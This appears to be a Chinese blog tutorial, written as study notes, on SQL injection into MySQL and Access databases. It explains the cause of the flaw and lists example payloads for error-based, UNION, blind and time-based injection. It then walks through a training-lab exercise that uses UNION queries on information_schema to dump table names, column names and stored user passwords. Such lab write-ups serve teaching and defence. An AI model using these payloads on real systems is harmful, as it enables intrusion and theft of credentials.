SQL注入,MYSQL跨库,ACCESS跨库

最新推荐文章于 2024-10-13 10:00:12 发布
最新推荐文章于 2024-10-13 10:00:12 发布
阅读量818 收藏 29
点赞数 20
文章标签: sql mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74120514/article/details/139565341
版权

ACCESS数据库

Access数据库是一种关系型数据库管理系统,广泛应用于桌面应用程序和Web应用程序的开发

 Access是单独存在的数据库

数据库名

             表名

                     列名

                            数据

MYSQL数据库

MYSQL数据库内置了root最高用户,划分等级,每个用户对应管理一个数据库,各个用户没有关联

MYSQL统一管理,最高数据用户=root用户

数据库A=网站A=数据库用户A

表名

       列名

               数据

数据库B=网站B=数据库用户B

数据库C=网站C=数据库用户C

SQL注入漏洞的原理

用程序对用户输入的数据未进行充分的验证和过滤。当应用程序直接将用户输入的数据拼接到SQL查询语句中时,攻击者可以通过特制的输入来操控SQL语句的执行。

在代码与数据库进行数据通讯时(从数据库中取出相关数据进行页面显示),将定义的SQL语句进行执行查询数据时,其中的SQL语句通过参数传递定义值来实现控制SQL语句,来实现查询其他数据(如数据库中的管理员账号密码)

漏洞产生根本条件:可控变量(id=1),特定函数

http://192.168.46.160:85/Production/PRODUCT.asp

http://192.168.46.160:85/Production/PRODUCT.asp?id=1513

如果下面的URL地址测试注入判断id有注入,手工测试该如何进行?
http://192.168.46.160:85/Production/PRODUCT.asp?id=1513&page=1
http://192.168.46.160:85/Production/PRODUCT.asp?page=1&id=1513
Production/PRODUCT.asp?id=1513 注入语句&page=1                       √
Production/PRODUCT.asp?id=1513&page=1 注入语句                       ×

说明注入语句应该在id后面进行注入

MYSQL注入思路:

(1)识别注入点:攻击者首先需要找到可以输入 SQL 代码的地方,如登录表单、搜索框、URL 参数等。
(2)构造恶意 SQL 代码:通过试探性的输入,攻击者构造出能够修改原始 SQL 查询的恶意代码。
(2)执行恶意代码:将恶意 SQL 代码嵌入正常的 SQL 查询中,并通过服务器执行,从而实现攻击目的。

一般的注入类型:

(1)基于错误的注入:利用 SQL 错误信息来推断数据库结构和内容。例如,通过输入 1' AND 1=1 -- ,查看返回结果是否正常,从而判断是否存在注入漏洞。


(2)联合查询注入:使用 UNION 关键字,将多个查询结果合并在一起。例如,输入 1' UNION SELECT username, password FROM users -- 来获取其他表的数据。


(3)盲注(Blind Injection):当服务器不返回错误信息时,攻击者通过逻辑判断来逐步推断数据库内容。例如,输入 1' AND (SELECT COUNT(*) FROM users) > 0 -- 来判断用户表是否存在。


(4)基于时间的盲注:利用数据库的时间延迟功能,通过测量响应时间来推断数据库内容。例如,输入 1' AND IF(1=1, SLEEP(5), 0) -- ,如果服务器响应延迟,说明条件成立。

MYSQL5.0以上版本:

mysql5.0以上的版本加入了信息库名information_schema

information_schema:存储数据库下的数据库名及表名,列名信息的数据库
information_schema.schematas:记录数据库信息表
information_schema.tables:记录表名信息的表
information_schema.columns:记录列名信息表

version():查询数据库版本

user():查询用户是否为root

@@version_compile_os:查询系统

database():查询数据库名

PHP+MYSQL的注入步骤

(1)  ‘and '1'='1 和 ’and '1'='2来判断
  http://xxx/abc.php?id= 1 and '1'='1 页面运行正常,继续进行下一步。          
  http://xxx/abc.php?id= 1 and '1'='2 页面运行错误,则说明此 Sql 注入为字符型注入。

(2)id后面加上order by查询页数

(3)在id后面用union注入语句查看数据库信息,' UNION SELECT 1,2 ,3,4,5,6,7,有返回值判断数据库的列数

(4)判断列数后再回显的数字上填入查询的语句(version(),user())等查看数据库的信息

墨者案例演示:

启动sql手工注入漏洞测试(Access数据库)

这个有可控变量显示(id=1)

下一步用and测试(这里可以注入)

order by 测试可显示列数为4(5的时候页面错误,4的时候页面正确),下一步就是union select 1,2,3,4测试显示位,这里显示结果为2和3

爆数据库名,版本,用户等:id=-1 union select 1,user(),database(),4

爆数据库表名:id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()

爆数据库表名:id=-1 union select 1,group_concat(column_name) ,3,4 from information_schema.columns where table_schema=database() and table_name="StormGroup_member"

爆数据:id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

解码就是。

初黑子zzz
关注
php结合ACCESS跨库查询功能
10-24
错误的SQL语句不仅导致查询失败,还可能带来安全风险,比如SQL注入攻击。 7. 在PHP与Access跨库查询实现中,要注意服务器环境的兼容性问题。比如,路径格式和数据库文件的权限设置等,都可能因为服务器的操作系统...
MySQL跨库注入
一个普普通通的博客
03-01 387
Mysql跨库注入
SQL注入漏洞全接触.ppt
11-15
* 根据不同的数据库管理系统, SQL注入漏洞可以分为Access注入SQL Server注入MySQL注入等。 * 不同的数据库管理系统有不同的函数、注入方法,所以在注入之前,我们还要判断一下数据库的类型。 四、 SQL注入漏洞...
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP...超级SQL注入工具目前支持Bool型盲注、错误显示注入、Union注入,支持AccessMySQL5以上版本、SQLServer、Oracle等数据库
sql注入初学——松风1
08-03
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能正确过滤或验证用户输入的情况下,允许攻击者向SQL查询中插入恶意代码。本文将深入探讨SQL注入的基本概念、检测方法以及针对不同数据库类型的识别技术。 ...
SQL】深入探索SQL调优:提升数据库性能的全面指南
人生苦短,睡觉要紧,睡醒再说
10-09 1480
在本文中,我们深入探讨了SQL调优的重要性及其在提升数据库性能中的关键角色。从理解执行计划到选择合适的索引,每一个细节都能显著影响应用程序的响应速度和处理能力。我们强调了基本的优化原则,如避免使用SELECT *、合理使用JOIN,以及定期更新统计信息。同时,数据库配置和硬件优化也不可忽视,它们直接关系到系统的整体性能。通过采用这些策略和技术,开发者和数据库管理员能够有效提高数据库的效率,确保系统在高负载下依然稳定运行。
sql调优指南及高级sql技巧
最新发布
weixin_42462436的博客
10-13 591
SQL调优和高级SQL技巧是数据库管理和开发中的重要内容,能够帮助你更高效地进行数据库查询操作并优化性能。以下内容将详细介绍SQL调优的指南、常见的优化策略,以及一些高级SQL编写技巧。
手写mybatis之SQL执行器的定义和实现
CSDN_LiMingfly的博客
10-08 877
所有系统的设计和实现,核心都在于如何解耦,如果解耦不清晰最后直接导致的就是再继续迭代功能时,会让整个系统的实现越来越臃肿,稳定性越来越差。而关于解耦的实践在各类框架的源码中都有非常不错的设计实现,所以阅读这部分源码,就是在吸收成功的经验。把解耦的思想逐步运用到实际的业务开发中,才会让我们写出更加优秀的代码结构。设计。
【PostgreSQL 】运维篇——未来趋势:发展与社区
thinking_chou的专栏
10-10 933
PostgreSQL活跃的社区生态为用户提供了丰富的资源和支持,社区成员可以通过多种方式参与到PostgreSQL的开发和推广中。通过共同努力,PostgreSQL将继续成为一个强大、灵活和安全的数据库解决方案,满足不断变化的业务需求。
LlamaIndex 结构化数据库交互指南增强(text2sql
洛阳泰山的博客
10-10 1267
许多现代数据系统都依赖于结构化数据,例如或Snowflake数据仓库。LlamaIndex提供了许多由LLM提供支持的高级功能,可以从中创建结构化数据 非结构化数据,以及通过增强的文本到 SQL 功能分析这些结构化数据。:任何应用程序都应该意识到,执行 任意SQL查询可能存在安全风险。建议 根据需要采取预防措施,例如使用受限角色、只读 数据库、沙箱等。本指南帮助介绍这些功能中的每一项。SQLsql
MYSQL|高频 SQL 50 题|550. 游戏玩法分析 IV
糖炒栗子
10-09 918
SELECTplayer_id,FROMactivityGROUP BYplayer_id:通过 WITH 子句,定义一个公共表达式;MIN函数找到每个玩家首次登陆日期;按照 player_id 进行分组。可以讲 CTE 理解为一个临时表,它包含了每个玩家的首次登陆日期,供住查询中使用。
SQL第13课挑战题
m0_47482290的博客
10-07 446
5. 列出供应商(vendors表中的vend_id)及其可供产品的数量,包括没有产品的供应商。3. 使用outer join联结products表和orderitems表,返回产品名称(prod_name)和与之相关的订单号(order_num)的列表,并按商品名称排序。1. 使用inner join,以检索每个顾客的名称(customers表中的cust_name)和所有的订单号(orders表中的order_num).4. 修改上一题中创建的SQL语句,使其返回每一项产品的总订单数(不是订单号)。
九大核心 NoSQL 数据库及使用场景详解
铭毅天下Elasticsearch
10-10 877
在现代应用中,NoSQL 数据库以其灵活性、扩展性和性能优势成为各类数据存储的首选。本文基于九种 NoSQL 数据库的典型用例,详细解析它们的技术特点和应用场景。1. MongoDB - 文档存储MongoDB 是最知名的文档存储数据库,支持 BSON 格式,具有无模式设计和水平扩展能力,常用于大规模非结构化数据的存储。发布日期/公司: 2009年,由 MongoDB Inc. 发布GitHub:...
Dify实现text2sql工作流[SQL调用篇],并查询Postgres数据库 or Mysql数据库(docker容器)
丨汀、的博客
10-09 157
Dify实现text2sql工作流[SQL调用篇],并查询Postgres数据库 or Mysql数据库(docker容器)
HeidiSQL 数据库密码如何恢复
HONEY MOOSE
10-09 513
有时候我们会把数据库的连接密码保存在 HeidiSQL 中,但随着时间的流逝,我们可能希望重新找回保存在 HeidiSQL 中的密码,但 HeidiSQL 中保存的密码是无法被复制的。这时候,我们需要想办法找到原始的密码。
SQL自学:怎么创建视图
Nervousr的博客
10-13 1004
具体来说,选择了“customers”表中的“customer_name”(客户姓名)和“city”(客户所在城市),同时通过对“orders”表中的“order_id”进行计数(使用“COUNT(o.order_id)”并别名为“total_orders”)得到每个客户的订单总数,以及对“orders”表中的“total_amount”进行求和(使用“SUM(o.total_amount)”并别名为“total_amount”)得到每个客户的总金额。这个视图是基于名为“employees”的表创建的。
PostgreSQL的学习心得和知识总结(一百五十三)|[performance]将 OR 子句转换为 ANY 表达式
孤傲小二~阿沐的博客
10-09 885
[performance]将 OR 子句转换为 ANY 表达式
力扣SQL数据库(1098~1132)
weixin_65642229的博客
10-09 508
编写解决方案,筛选出过去一年中订单总量 少于 10 本 的 书籍,并且 不考虑 上架距今销售 不满一个月 的书籍。假设今天是 2019-06-23。编写解决方案,找出从今天起最多 90 天内,每个日期该日期首次登录的用户数。编写解决方案,找出每位学生获得的最高成绩和它所对应的科目,若科目成绩并列,取。编写解决方案,统计在被报告为垃圾广告的帖子中,被移除的帖子的每日平均占比,编写解决方案,针对每个举报原因统计昨天的举报帖子数量。使用桌面端和手机端的用户人数和总支出金额。的具有该事件的所有公司的。
SQL】掌握SQL查询技巧:数据分组与排序
人生苦短,睡觉要紧,睡醒再说
10-08 1235
GROUP BY子句用于将来自SELECT查询的数据行分组,通常与聚合函数(如COUNTSUMAVGMAX和MIN)一起使用,以便对每个组执行计算。这种分组使我们能够对数据进行汇总分析,提取有用的信息。ORDER BY子句用于对查询结果进行排序。默认情况下,排序是升序的,但可以使用DESC关键字指定降序排序。这有助于用户根据特定的需求查看数据。通过掌握GROUP BY和ORDER BY子句,你可以有效地分析和整理 SQL 查询的结果。无论是进行数据汇总还是结果排序,这两者都是数据分析中不可或缺的工具。
Access跨库查询实战:实例与技巧揭秘
在实际的Web应用程序安全(如ASP)场景中,尤其是在可能存在SQL注入的情况下,作者提到了利用`UNION`查询进行跨库操作。与PHP和MySQL结合的技巧相似,通过`UNION`可以避免逐字符猜测数据,而是可以直接暴露字段内容...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值